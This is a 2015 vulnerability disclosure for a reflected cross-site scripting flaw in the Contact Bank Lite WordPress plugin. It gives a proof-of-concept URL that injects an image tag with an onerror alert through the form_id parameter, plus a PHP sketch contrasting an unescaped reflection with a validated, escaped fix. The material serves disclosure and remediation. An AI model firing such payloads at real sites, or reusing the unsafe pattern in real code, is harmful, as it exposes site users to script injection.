Subject: Cross-Site Scripting (XSS) in Contact Bank Lite Edition 2.0.225
Date: Thu, 13 Aug 2015 15:28:50 +0200

Hello,

Plugin: Contact Bank Lite Edition 2.0.225 https://wordpress.org/plugins/contact-bank/

1. Cross-Site Scripting (XSS) 

Authenticated users (e.g. editors) can inject HTML/JS code.

Method: GET
URL: http://localhost/wp-admin/admin.php?page=form_preview&form_id=[xss]
Vulnerable parameter: form_id

Example PHP call stack:
/contact-bank/views/contact_bank_form_preview.php:286

Verification:
http://localhost/wp-admin/admin.php?page=form_preview&form_id=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E
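The defect class behind the finding is a reflected query-string value written into page markup without validation or output escaping. The plugin's actual code at the quoted line is not reproduced in this mail, so the snippet below is an added illustration, not the plugin's own code: a hypothetical unsafe pattern of the kind described above next to a hardened version. It assumes the WordPress core helpers absint(), wp_unslash(), esc_attr(), esc_html__(), current_user_can() and wp_die(), which exist in wp-admin; the capability name used in the authorisation check is a placeholder, since the mail does not state which role the preview page is meant for.

```php
<?php
// Added illustration (not the plugin's code) of the form_id reflection
// described in the advisory and of its fix. Assumes WordPress core helpers.

/**
 * Hypothetical unsafe pattern: the raw query-string value is reflected
 * into an HTML attribute. A value containing a closing quote and angle
 * brackets terminates the attribute and injects new markup into the page.
 */
function cb_preview_unsafe() {
    $form_id = $_GET['form_id'];                 // untrusted, unfiltered
    echo '<input type="hidden" name="form_id" value="' . $form_id . '" />';
}

/**
 * Hardened version:
 *  1. authorise the caller (the capability below is a placeholder);
 *  2. validate form_id as a positive integer: it is a database id and no
 *     other value is legitimate, so type enforcement alone removes the
 *     injection vector;
 *  3. still escape at the output sink, so the page stays safe even if the
 *     validation step is later loosened.
 */
function cb_preview_safe() {
    if ( ! current_user_can( 'manage_options' ) ) { // placeholder capability
        wp_die( esc_html__( 'You are not allowed to preview forms.' ) );
    }

    $form_id = isset( $_GET['form_id'] ) ? absint( wp_unslash( $_GET['form_id'] ) ) : 0;
    if ( 0 === $form_id ) {
        wp_die( esc_html__( 'Invalid form id.' ) );
    }

    echo '<input type="hidden" name="form_id" value="' . esc_attr( $form_id ) . '" />';
}
```

Validation and escaping are both kept on purpose: absint() is what actually closes the hole for an integer id, while esc_attr() at the sink is the defence that survives future refactoring of the input handling.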

--
Regards,
Marcin Probola,